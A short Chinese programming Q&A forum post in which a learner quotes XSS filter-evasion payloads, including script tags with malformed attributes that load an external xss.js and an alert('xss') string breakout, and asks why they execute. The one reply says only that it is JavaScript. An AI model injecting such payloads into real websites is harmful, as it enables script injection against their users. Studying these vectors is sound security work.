求助：xss跨站脚本攻击代码有点看不懂

今天看了点xss攻击常见的具体形式，代码有点看不懂<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
\";alert('xss');//
这些代码貌似不符合html的语法规则吧，那这些恶意脚本怎么会运行呢？它们代表的又是什么意思呢？望大虾们指点啊！ --------------------编程问答-------------------- 这是javascript

补充：云计算 ,  云安全